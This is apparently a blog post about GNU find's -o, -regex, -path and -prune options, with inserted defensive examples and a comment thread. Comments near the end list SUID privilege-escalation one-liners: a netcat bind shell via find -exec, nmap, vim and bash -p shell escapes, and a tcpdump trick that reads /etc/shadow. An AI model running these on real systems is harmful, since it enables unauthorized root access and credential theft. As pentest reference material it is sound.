=Start=
=find's -o / -regex options=
The title is a bit of a mouthful, but the feature is genuinely useful. I have used it before without ever writing it down, so this post records it.
`
# Requirement: find all JPG and PNG image files under the current directory
# Method 1
find -maxdepth 2 -type f \( -iname \*.jpg -o -iname \*.png \)
# -maxdepth is a global option and has to come before tests such as -type (GNU find warns otherwise)
find -maxdepth 2 -type f -mtime -7 \( -name '*.jpg' -o -name '*.png' \)
# Method 2 (GNU find's default regex syntax needs \( \| \) for grouping and alternation)
find -maxdepth 2 -iregex '.*\.\(jpg\|png\)$'
# Method 3 (POSIX extended syntax: plain ( | ) )
find -maxdepth 2 -regextype posix-extended -regex '.*\.(jpg|png)$'
`
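As an added example (not code from the original post), the `-o` grouping and the regex form are run side by side against a small constructed directory tree so that two details can be checked rather than assumed: the escaped parentheses that make `-type f` apply to both `-iname` tests, and the quoting that stops the shell from expanding the globs before find sees them. It assumes GNU find (for `-regextype`) and a POSIX sh; the fixture paths are made up for the demonstration.

```shell
#!/bin/sh
# Added example: the three find variants from the post, checked against a
# constructed tree.  Assumes GNU find; the fixture below is made up.

# Constructed fixture: image and non-image files, up to three levels deep.
make_fixture() {
    dir=$(mktemp -d)
    mkdir -p "$dir/photos/2023" "$dir/docs"
    touch "$dir/a.jpg" "$dir/B.PNG" "$dir/photos/c.png" \
          "$dir/photos/2023/deep.jpg" "$dir/docs/notes.txt" "$dir/readme.jpeg"
    printf '%s\n' "$dir"
}

# Method 1: -o inside an escaped group.  Without the group, -type f would
# bind only to the first -iname test.  The patterns are quoted so the shell
# never expands them against the current directory.
images_by_name() {
    find "$1" -maxdepth 2 -type f \( -iname '*.jpg' -o -iname '*.png' \) | sort
}

# Methods 2/3 in one: -iregex is case-insensitive and matches the whole
# path, so the leading .* is mandatory.  posix-extended spares the
# \( \| \) escaping of GNU find's default (emacs) syntax.
images_by_regex() {
    find "$1" -maxdepth 2 -type f -regextype posix-extended \
         -iregex '.*\.(jpg|png)$' | sort
}

# Demo when run directly: both methods should list the same three files
# (a.jpg, B.PNG, photos/c.png); deep.jpg is below -maxdepth 2 and
# readme.jpeg does not match either pattern.
demo() {
    d=$(make_fixture)
    echo "by -o/-iname:";  images_by_name "$d"
    echo "by -iregex:";    images_by_regex "$d"
    rm -rf "$d"
}
demo
```

When the result is consumed by another program, append `-print0` and read it with `xargs -0`; a file name containing a newline would otherwise turn into two lines, which is exactly how attacker-chosen file names slip extra entries into a script's output.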
References:
- http://unix.stackexchange.com/questions/15308/how-to-use-find-command-to-search-for-multiple-extensions
- http://stackoverflow.com/questions/7190565/unix-find-multiple-file-types
=find's -path / -prune options=
`
# looks for files we can write to that don't belong to us (note the pattern after -path: it carries a wildcard)
if [ "$thorough" = "1" ]; then
  grfilesall=$(find / -writable -not -user "$(whoami)" -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null)
  if [ "$grfilesall" ]; then
    echo -e "\e[00;31mFiles not owned by user but writable by group:\e[00m\n$grfilesall" | tee -a $report 2>/dev/null
    echo -e "\n" | tee -a $report 2>/dev/null
  else
    :
  fi
fi

# list all world-writable files excluding /proc (negation written as ! here; -not is the other spelling)
if [ "$thorough" = "1" ]; then
  wwfiles=$(find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null)
  if [ "$wwfiles" ]; then
    echo -e "\e[00;31mWorld-writable files (excluding /proc):\e[00m\n$wwfiles" | tee -a $report 2>/dev/null
    echo -e "\n" | tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi
`
-path pattern
    File name matches shell pattern pattern. The metacharacters do not treat `/' or `.' specially; so, for example,
        find . -path "./sr*sc"
    will print an entry for a directory called `./src/misc' (if one exists). To ignore a whole directory tree, use -prune rather than checking every file in the tree. For example, to skip the directory `src/emacs' and all files and directories under it, and print the names of the other files found, do something like this:
        find . -path ./src/emacs -prune -o -print
    Note that the pattern match test applies to the whole file name, starting from one of the start points named on the command line. It would only make sense to use an absolute path name here if the relevant start point is also an absolute path. This means that this command will never match any thing:
        find bar -path /foo/bar/myfile -print
    The predicate -path is also supported by HP-UX find and will be in a forthcoming version of the POSIX standard.

# The argument to -path is a "pattern", a shell-style match string, and it only decides at the very end whether an entry is printed: by then the directory has already been searched. If a directory should not be searched at all, use -prune, which skips descending into it altogether; that is faster and more efficient.

-prune
    True; if the file is a directory, do not descend into it. If -depth is given, false; no effect. Because -delete implies -depth, you cannot usefully use -prune and -delete together.
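To make the difference between "filter after visiting" (`! -path`) and "never descend" (`-prune`) observable, here is an added example that is not part of the original post or the LinEnum snippet above. It builds a constructed tree, counts how many nodes find actually visits under each form, shows that both return the same files, and reproduces the man page's start-point pitfall (an absolute `-path` pattern tested against a relative start point never matches, so nothing is pruned). It assumes GNU find and a POSIX sh.

```shell
#!/bin/sh
# Added example: -prune versus "! -path" on a constructed tree.  Assumes GNU
# find; the directory layout below is made up for the demonstration.

make_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/keep" "$d/skip/sub"
    touch "$d/b.txt" "$d/keep/a.txt" "$d/skip/x.txt" "$d/skip/sub/y.txt"
    printf '%s\n' "$d"
}

# -print is first and always true, so it records every node find visits;
# the -path test that follows decides whether the subtree is pruned.
# Expected: the root, b.txt, keep, keep/a.txt and skip itself (5 nodes).
visited_with_prune() {
    find "$1" -print -path "$1/skip" -prune | wc -l | tr -d ' '
}

# Same probe with the LinEnum-style "! -path" filter: every node is still
# visited (8 here); the filter only drops entries from the final result.
visited_with_not_path() {
    find "$1" -print ! -path "$1/skip/*" | wc -l | tr -d ' '
}

# The two usual ways to exclude the subtree; both return the same files.
files_with_prune() {
    find "$1" -path "$1/skip" -prune -o -type f -print | sort
}
files_with_not_path() {
    find "$1" ! -path "$1/skip/*" -type f | sort
}

# Pitfall from the man page: -path matches the name as find builds it from
# the start point.  Starting at "." while testing an absolute pattern never
# matches, so nothing is pruned and the skip/ files come back as well.
files_wrong_start_point() {
    (cd "$1" && find . -path "$1/skip" -prune -o -type f -print) | sort
}

demo() {
    t=$(make_tree)
    echo "nodes visited with -prune:   $(visited_with_prune "$t")"
    echo "nodes visited with ! -path:  $(visited_with_not_path "$t")"
    echo "files (prune):";   files_with_prune "$t"
    echo "files (! -path):"; files_with_not_path "$t"
    echo "files with mismatched start point:"; files_wrong_start_point "$t"
    rm -rf "$t"
}
demo
```

On a real system the visit count is what matters: `! -path "/proc/*"` still walks all of /proc and pays for every stat and every permission error, whereas `-path /proc -prune` never enters it.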
=EOF=
9 comments on "Using find on Linux to search for several file types at once"
-prune: if the matching entry is a directory, do not descend into it. Example:
`
[root@localhost ~]# mkdir /etc/passs
[root@localhost ~]# touch /etc/passs/passwd
[root@localhost ~]# find /etc/ -name "pass*" -prune
/etc/passs
/etc/default/passwd
/etc/pam.d/passwd
/etc/passwd-
/etc/passwd
[root@localhost ~]# find /etc/ -name "pass*"
/etc/passs
/etc/passs/passwd
/etc/default/passwd
/etc/pam.d/passwd
/etc/passwd-
/etc/passwd
`
Reference:
http://liwei.life/2016/07/11/find%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/
Three ways to delete all files in a directory except those of certain types
https://linux.cn/article-7954-1.html
suid backdoor
`
# find / -perm -4000 -type f -print0 2>/dev/null | xargs -0 ls -lt
# find / -perm -4000 -user root -type f -print0 2>/dev/null | xargs -0 ls -lt
# For our fuzzy-search requirement, mainly use the '-perm -mode' form rather than '-perm +mode'
`
https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/
http://en.wikipedia.org/wiki/Setuid
http://joshrendek.com/2013/02/why-setuid-is-bad-and-what-you-can-do/
https://gist.githubusercontent.com/dergachev/7916152/raw/f2a89578d2dbb89f9726153117d10b6b5a49caec/setuid-root-backdoor.md
How to use find -perm on Linux
http://blog.csdn.net/zbszhangbosen/article/details/7528680
http://bbs.chinaunix.net/thread-442733-1-1.html
A look into SUID binaries that yield a root shell
http://www.freebuf.com/articles/system/149118.html
https://pentestlab.blog/2017/09/25/suid-executables/
`
SUID is a Linux permission mechanism: a file carrying this bit temporarily grants the caller the privileges of the file's owner while it runs. With SUID permission in place, binaries and tools on the system can be used to escalate to root.
Linux executables known to be usable for privilege escalation include:
- Nmap
- Vim
- find
- Bash
- More
- Less
- Nano
- cp
`
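From the defender's side, the `find / -perm -4000` one-liners in the "suid backdoor" comment and the list of escalation-prone binaries in the comment just above suggest one routine check. The following is an added example, not code from the original post, the comments or the linked articles: it inventories setuid/setgid files under a root, diffs the inventory against a saved baseline so that a newly planted setuid binary stands out, and flags basenames that appear on the comment's list. It assumes GNU find (`-printf`, `-perm /mode`) and GNU coreutils; the fixture tree and its file names are constructed for the demonstration, and the risky-name list is the comment's, not an exhaustive one.

```shell
#!/bin/sh
# Added example: setuid/setgid inventory, baseline diff and risky-name check.
# Assumes GNU find and coreutils; the fixture below is constructed.

# Basenames the comment above lists as usable for escalation when setuid.
RISKY_NAMES="nmap vim vim.tiny find bash more less nano cp"

# One line per setuid/setgid regular file: "mode owner path".
# -perm /6000 = any of setuid|setgid (the modern spelling of deprecated +mode).
# -xdev keeps the scan on one filesystem.  Sorted in the C locale so the
# result can be fed straight to comm.  Paths containing a newline would
# break this line format; use -print0 | xargs -0 for a forensic dump.
suid_inventory() {
    find "$1" -xdev -type f -perm /6000 -printf '%M %u %p\n' 2>/dev/null \
        | LC_ALL=C sort
}

# Lines present now but absent from the baseline file: a new setuid bit,
# or a changed owner/mode on a known one.  Empty output means no change.
suid_new_since_baseline() {
    suid_inventory "$1" | LC_ALL=C comm -13 "$2" -
}

# Inventory entries whose basename is on the risky list.
suid_risky() {
    suid_inventory "$1" | while IFS=' ' read -r mode owner path; do
        name=${path##*/}
        for r in $RISKY_NAMES; do
            if [ "$name" = "$r" ]; then printf '%s %s %s\n' "$mode" "$owner" "$path"; fi
        done
    done
}

# Constructed fixture: a setuid script named like a risky tool, a setgid
# helper and a plain file.  (The kernel ignores setuid on scripts, so the
# fixture is harmless; the bit is only there for find to see.)
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/opt/app"
    printf '#!/bin/sh\nexit 0\n' > "$d/usr/bin/cp"
    printf '#!/bin/sh\nexit 0\n' > "$d/opt/app/helper"
    printf 'plain\n' > "$d/opt/app/README"
    chmod 4755 "$d/usr/bin/cp"
    chmod 2755 "$d/opt/app/helper"
    printf '%s\n' "$d"
}

# Demo: take a baseline, plant one more setuid file, show what the diff and
# the risky-name check report.
demo() {
    t=$(make_fixture)
    suid_inventory "$t" > "$t/baseline.txt"
    printf '#!/bin/sh\nexit 0\n' > "$t/opt/app/newly_setuid"
    chmod 4755 "$t/opt/app/newly_setuid"
    echo "new since baseline:"; suid_new_since_baseline "$t" "$t/baseline.txt"
    echo "risky names:";        suid_risky "$t"
    rm -rf "$t"
}
demo
```

In practice the baseline is taken right after provisioning and stored off-host; a non-empty diff is then an alert to investigate, and any hit from the risky-name check is a candidate for removing the bit or replacing the binary with a capability-scoped one.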
DumpsterDiver: a tool that analyses large numbers of files of all types in search of hard-coded secrets
https://github.com/securing/DumpsterDiver
A complete guide to Fuzzy finder (fzf + vim)
https://keelii.com/2018/08/12/fuzzy-finder-full-guide/
https://github.com/junegunn/fzf
`
Fuzzy finder is an interactive Unix command-line tool written in Go. It can search any list: files, Git branches, processes and so on. Any command-line tool that produces list output can be piped into fzf for searching and filtering.
Advantages:
Written in Go; the compiled executable has no dependencies
Searching is extremely fast
Comprehensive features and a very pleasant visual interface
Rich ecosystem of plugins (vim, tmux, fuzzy auto-completion)
`
A simple, fast and user-friendly alternative to ‘find’
https://github.com/sharkdp/fd
Tiny file search utility (bash)
https://github.com/rauchg/spot
`
# a good example to learn bash programming from
Short & written in Bash: you can edit it easily to suit your liking.
Fast. Just find + grep + awk.
Searches most things by default instead of some known predefined extensions.
Ignores .git, .hg, .svn, devices and binary files.
`
Privilege escalation via SUID on Linux
https://mp.weixin.qq.com/s/UfPLm53gAlc_z28kH4OYHQ
`
nmap --interactive
nmap> !sh
sh-3.2# whoami
root
touch pentestlab
find pentestlab -exec whoami \;
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
vim.tiny /etc/shadow
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
less /etc/passwd
more /home/pelle/myfile
# use cp to overwrite /etc/shadow
# use mv to overwrite /etc/shadow or /etc/sudoers
awk 'BEGIN {system("/bin/bash")}'
man passwd
# perl
exec "/bin/bash";
# python
import os
os.system("/bin/bash")
# tcpdump
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
`
[…] Using find on Linux to search for several file types at once https://ixyzero.com/blog/archives/2510.html […]